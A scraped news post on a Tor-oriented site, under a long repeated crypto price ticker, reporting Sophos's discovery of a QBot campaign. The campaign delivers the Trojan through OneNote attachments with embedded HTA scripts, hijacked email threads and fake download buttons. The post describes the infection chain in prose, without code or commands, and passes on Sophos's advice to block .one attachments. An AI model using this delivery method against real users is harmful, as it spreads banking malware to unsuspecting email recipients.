BTC $55865.7639
ETH $3222.4858
BNB $400.6682
SOL $110.6842
XRP $0.5548
ADA $0.6230
AVAX $39.2767
DOGE $0.0896
TRX $0.1404
wstETH $3751.1765
LINK $19.0474
DOT $8.0594
WETH $3236.9354
MATIC $1.0625
UNI $10.5983
WBTC $55965.3668
IMX $3.3901
ICP $13.0143
BCH $300.6764
LTC $74.8911
CAKE $3.2355
FIL $8.1517
ETC $28.1561
RNDR $7.4096
KAS $0.1718
DAI $0.9979
HBAR $0.1117
ATOM $11.3293
VET $0.0491
INJ $36.5642
TON $2.1072
OKB $51.3395
LDO $3.5443
FDUSD $1.0015
STX $3.0723
ARB $1.9162
NEAR $4.0168
XMR $131.7677
TIA $17.0755
XLM $0.1186
GRT $0.2823
ENS $22.2643
THETA $2.1117
MKR $2155.4331
WEMIX $2.1023
APEX $2.4575
BEAM $0.0357
BTC $55865.7639
ETH $3222.4858
BNB $400.6682
SOL $110.6842
XRP $0.5548
ADA $0.6230
AVAX $39.2767
DOGE $0.0896
TRX $0.1404
wstETH $3751.1765
LINK $19.0474
DOT $8.0594
WETH $3236.9354
MATIC $1.0625
UNI $10.5983
WBTC $55965.3668
IMX $3.3901
ICP $13.0143
BCH $300.6764
LTC $74.8911
CAKE $3.2355
FIL $8.1517
ETC $28.1561
RNDR $7.4096
KAS $0.1718
DAI $0.9979
HBAR $0.1117
ATOM $11.3293
VET $0.0491
INJ $36.5642
TON $2.1072
OKB $51.3395
LDO $3.5443
FDUSD $1.0015
STX $3.0723
ARB $1.9162
NEAR $4.0168
XMR $131.7677
TIA $17.0755
XLM $0.1186
GRT $0.2823
ENS $22.2643
THETA $2.1117
MKR $2155.4331
WEMIX $2.1023
APEX $2.4575
BEAM $0.0357
  • Catalog
  • Blog
  • Tor Relay
  • Jabber
  • One-Time notes
  • Temp Email
  • What is TOR?
  • We are in tor
  • QBot operators now use OneNote to spread Trojan via email

    Security company Sophos has discovered a new QBot campaign dubbed “QakNote,” which uses malicious Microsoft OneNote attachments to infect systems with a banking Trojan.

    A new Sophos report says the campaign began on January 31, 2023 and uses OneNote files containing an embedded HTML application (HTA file) that extracts the QBot malware payload. This transition in the QBot distribution was first publicly announced by Cynet researcher Max Malyutin on Twitter on January 31, 2023.

    The script in the HTA file uses the legitimate application "curl.exe" to load the Qbot DLL into the "C:\ProgramData" folder and then executes with "Rundll32.exe".

    The QBot payload is embedded in the Windows Assistive Technology manager (AtBroker.exe) to hide its presence and avoid detection by antivirus software.

    Sophos reports that QBot operators use 2 methods for distributing HTA files: the first is sending emails with an embedded link to the infected ".one" file, and the second is the "stream injection" method.

    The thread injection technique is a process where QBot operators hijack existing email threads and send a "reply to all" message to all participants in the thread, attaching a malicious OneNote file to the email as an attachment.

    To make these attacks even more deceptive for victims, attackers embed a fake button in a OneNote document that supposedly downloads the document from the cloud, but when clicked, launches an embedded HTA attachment instead. Although after clicking the button, the user will be warned about the risk of launching attachments, there is always a chance that the victim will ignore it.

    As a defense against this new attack vector, Sophos suggests that email administrators consider blocking all files with the ".one" extension, as they are not normally sent as attachments.

    Author DeepWeb
    The heads of the largest IT companies are under investigation for conspiracy with the US government
    Why you can easily get into Pentagon through their employees?

    Comments 0

    Add comment